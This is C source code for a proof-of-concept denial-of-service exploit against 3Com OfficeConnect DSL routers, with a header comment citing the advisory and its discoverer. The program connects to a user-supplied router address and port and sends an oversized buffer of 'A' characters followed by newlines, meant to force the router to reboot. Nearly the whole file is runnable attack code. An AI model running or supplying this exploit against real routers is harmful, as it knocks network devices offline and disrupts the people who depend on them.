/* 3com-DoS.c 
 * 
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers.  This PoC exploit the
 * vulnerability documented at: <http://www.securityfocus.com/bid/8248>, 
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should cause the router to
 * reboot.  It is not believed that arbitrary code execution is possible - 
 * check advisory for more information.
 *
 * -shaun2k2
 */
 

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
	if(argc < 3) {
		printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
		printf("Usage: 3comDoS <3com_router> <port>\n");
		exit(-1);
	}

	int sock;
	char explbuf[521];
	struct sockaddr_in dest;
	struct hostent *he;

	if((he = gethostbyname(argv[1])) == NULL) {
		printf("Couldn't resolve %s!\n", argv[1]);
		exit(-1);
	}

	if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket()");
		exit(-1);
	}

	printf("3Com OfficeConnect DSL Router DoS exploit by shaun2k2 - <shaunige@yahoo.co.uk>\n\n");
	
	dest.sin_addr = *((struct in_addr *)he->h_addr);
	dest.sin_port = htons(atoi(argv[2]));
	dest.sin_family = AF_INET;

	printf("[+] Crafting exploit buffer.\n");
	memset(explbuf, 'A', 512);
	memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);

	if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
		perror("connect()");
		exit(-1);
	}

	printf("[+] Connected...Sending exploit buffer!\n");
	send(sock, explbuf, strlen(explbuf), 0);
	sleep(2);
	close(sock);
	printf("\n[+] Exploit buffer sent!\n");
	return(0);
}